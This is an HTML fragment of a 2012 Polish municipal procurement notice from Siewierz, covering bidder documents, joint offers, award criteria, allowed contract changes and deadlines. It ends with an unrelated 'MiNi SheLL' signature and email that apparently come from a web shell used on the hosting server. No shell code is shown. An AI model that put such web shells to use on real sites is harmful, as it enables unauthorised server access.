<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz oferty wg zał. Nr 1.
2.Pełnomocnictwo do reprezentowania w postępowaniu, jeżeli oferta będzie podpisana przez osobę (y) upoważnioną(e) lub w przypadku występowania podmiotów wspólnie w trybie art.23 ustawy Prawo zamówień publicznych.
3.Oświadczenie o spełnieniu warunków określonych przepisami art. 22 ust. 1 pkt.1-4 ustawy Prawo zamówień publicznych, wg zał. Nr 2.
Oferta podmiotów występujących wspólnie:
1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia  (np. w formie spółki cywilnej, konsorcjum, porozumienia zawartego między podmiotami). Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem (liderem).
2.Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.
3.Każdy z Wykonawców składających wspólną ofertę powinien złożyć osobno dokumenty wymienione w części III 4.2)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania istotnych zmian w umowie w następującym zakresie: 
1.Zmiana osób odpowiedzialnych za wykonanie zadania ze strony wykonawcy        i zamawiającego, która może nastąpić tylko na podstawie obiektywnych przesłanek zaakceptowanych przez Zamawiającego na osoby o takich samych kwalifikacjach
2.Uzasadniona zmiana terminu wykonania przedmiotu zamówienia w przypadku:
a)wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne  i poza kontrolą stron umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy,
b)wystąpienie  warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych zgodnie z technologią ich wykonania, 
c)konieczność wykonania  zamówień dodatkowych, o których mowa w art. 67 ust.1 pkt 5 Ustawy, których wykonanie jest niezbędne dla prawidłowego wykonania  oraz zakończenia podstawowego przedmiotu zamówienia wraz ze wszystkimi konsekwencjami występującymi w związku z przedłużeniem tego terminu,
d)w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na współfinansowanie zamówienia na usługę,
e)wydłużenia terminu realizacji umowy w przypadku wystąpienia uzasadnionych okoliczności których podstawa będą obiektywne przesłanki zaakceptowane przez zamawiającego, 
f)uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne  dla stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.siewierz.pl; www.siewierz.bip.info.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Siewierz 	
ul. Żwirki i Wigury 16
42-470 Siewierz
pok.30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2012 godzina 10:00, miejsce: Urząd Miasta i Gminy Siewierz 	
ul. Żwirki i Wigury 16
42-470 Siewierz
sekretariat pok.11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Na realizację części zadania Gmina uzyskała dofinansowanie Samorządu Województwa Śląskiego w ramach   działania 413 Wdrażanie lokalnych strategii rozwoju w zakresie operacji odpowiadających warunkom    przyznania pomocy w ramach działania Odnowa i rozwój wsi objętego PROW na lata 2007-2013.     W związku z powyższym procedury związane z odbiorami częściowymi, końcowymi i płatnościami będą    dostosowane do wymogów instytucji pośredniczącej PROW
Zamawiający nie przewiduje: przeprowadzenia aukcji elektronicznej, ustanowienia dynamicznego systemu zakupów, zwrotu kosztów udziału w postępowaniu, zawarcia umowy ramowej, udzielania zaliczek na poczet wykonania zamówienia, oraz nie przewiduje ograniczeń ubiegania się o zamówienie publiczne wynikających z art. 29 ust. 4 ustawy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com